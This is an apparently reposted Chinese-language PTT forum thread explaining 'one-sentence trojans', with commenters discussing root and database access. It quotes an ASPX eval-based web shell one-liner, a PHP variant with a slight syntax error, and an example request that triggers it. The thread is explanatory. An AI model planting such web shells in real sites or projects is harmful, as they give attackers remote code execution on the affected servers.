Fw: [問題] 一句話木馬

看板CyberSecure作者 (前端攻城師)時間6年前 (2019/05/24 23:31), 編輯推噓1(102)
留言3則, 2人參與, 6年前最新討論串1/1
※ [本文轉錄自 NetSecurity 看板 #1Svz_hP8 ] 作者: newnovice (serenity) 看板: NetSecurity 標題: [問題] 一句話木馬 時間: Fri May 24 20:13:28 2019 在網路上看到這個東東 <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%> 挺有趣的,有大神可以解釋這一行作用嗎,感謝。 -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 118.171.78.143 ※ 文章網址: https://www.ptt.cc/bbs/NetSecurity/M.1558700011.A.648.html

05/24 21:05, 6年前 , 1F
嗯,這句話真長...
05/24 21:05, 1F

05/24 21:06, 6年前 , 2F
eval是個可以把接收到的字串轉成code的函式,所以今天這個
05/24 21:06, 2F

05/24 21:06, 6年前 , 3F
程式收到一個Request,可能是get也可能是post吧,傳來了一
05/24 21:06, 3F

05/24 21:07, 6年前 , 4F
個變數叫作w,而我們在這個w中可以放入程式碼,然後他就會
05/24 21:07, 4F

05/24 21:08, 6年前 , 5F
執行,是說仔細看看,這樣應該算是兩句話...
05/24 21:08, 5F

05/24 21:09, 6年前 , 6F
真正一句話木馬---> eval($_GET('shell'));
05/24 21:09, 6F

05/24 21:10, 6年前 , 7F
要執行時像是這樣 foo.com/index.php?shell="echo 'atk';"
05/24 21:10, 7F

05/24 21:11, 6年前 , 8F
我打了好多字... 我可以轉CyberSecure板嘛?
05/24 21:11, 8F

05/24 22:07, 6年前 , 9F
一句話木馬都可以寫成半本書了 XD
05/24 22:07, 9F

05/24 23:03, 6年前 , 10F
請教st大 所以這個w算是拿到os的root shell嗎? 也能執
05/24 23:03, 10F

05/24 23:03, 6年前 , 11F
行任何資料庫的撈取?
05/24 23:03, 11F

05/24 23:25, 6年前 , 12F
嗯,沒意見,應該是可以轉,晚點轉轉
05/24 23:25, 12F

05/24 23:26, 6年前 , 13F
這個w有沒有取得root權限要看被注入木馬的檔案本身的權限
05/24 23:26, 13F

05/24 23:27, 6年前 , 14F
,一般而言,普通的檔案是不會有root權限的,如果操作正常
05/24 23:27, 14F

05/24 23:27, 6年前 , 15F
...我是有聽說過有不少人沒事就給PHPmyadmin root 然後被
05/24 23:27, 15F

05/24 23:27, 6年前 , 16F
人用這個REC時就Q了XDDD
05/24 23:27, 16F

05/24 23:28, 6年前 , 17F
以PHP為例,通常沒有意外的話,一個PHP是可以撈取DB,如果
05/24 23:28, 17F

05/24 23:29, 6年前 , 18F
沒有特別控管是可以執行任何資料庫的撈取沒錯
05/24 23:29, 18F

05/24 23:30, 6年前 , 19F
不過專業點的會把DB分段,這時就只能撈有權限的那段了
05/24 23:30, 19F
※ 發信站: 批踢踢實業坊(ptt.cc) ※ 轉錄者: st1009 (1.164.90.102), 05/24/2019 23:31:18

05/24 23:31, 6年前 , 20F
我覺得可以讓人稍微了解一下一句話,就轉過來了
05/24 23:31, 20F

05/24 23:35, 6年前 , 21F
是說我有些用詞沒有很精確,不要太在意>"<
05/24 23:35, 21F

05/26 02:58, 6年前 , 22F
05/26 02:58, 22F
文章代碼(AID): #1Sw0v7mg (CyberSecure)